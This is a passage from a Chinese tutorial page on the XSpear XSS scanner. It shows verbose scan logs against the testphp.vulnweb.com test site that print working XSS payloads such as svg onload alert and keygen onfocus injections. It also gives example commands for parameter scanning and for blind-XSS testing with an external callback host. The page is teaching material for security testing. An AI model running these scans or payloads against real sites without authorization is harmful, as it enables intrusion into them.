如何使用XSpear完成XSS扫描与参数分析

Code]
    [V] [22:42:59] [200/OK] found alert/prompt/confirm (45) in selenium!! '">svg/onload=alert(45)>[param: cat][triggered ]
    ...
    you see report
【3】显示扫描详细日志
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 3
    [*] analysis request..
    [-] [22:56:21] [200/OK] http://testphp.vulnweb.com/listproducts.php?cat=123 in url
    [ Request ]
    {"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["*/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]}
    [ Response ]
    {"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:53:23 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]}
    [-] [22:56:21] [200/OK] 'STATIC' not reflected
    [-] [22:56:21] [200/OK] cat=123rEfe6 in url
    ...
    [*] used test-reflected-params mode(default)
    [*] creating a test query [for reflected 2 param + blind XSS ]
    [*] test query generation is complete. [249 query]
    [*] starting XSS Scanning. [10 threads]
    ...
    [ Request ]
    {"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["*/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]}
    [ Response ]
    {"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:54:36 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]}
    [H] [22:57:33] [200/OK] reflected keygen autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
    ...
    you see report
使用样例
扫描XSS：
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
仅输出JSON结果：
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 0
设置扫描线程：
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30
测试选择的参数：
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test
测试所有的参数：
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -a
测试XSS盲注：
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht" -a
    # Set your blind xss host.
针对Pipeline：
$ xspear -u {target} -b "your-blind-xss-host" -a -v 0 -o json
    # -u : target
    # -b : testing blind xss
    # -a : test all params(test to not reflected param)
    # -v : verbose, not showing logs at value 1.
    # -o : output optios, json!
JSON格式结果：
{
        "starttime": "2019-12-25 00:02:58 +0900",

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]  下一页

 3/11   首页 上一页 1 2 3 4 5 6 下一页 尾页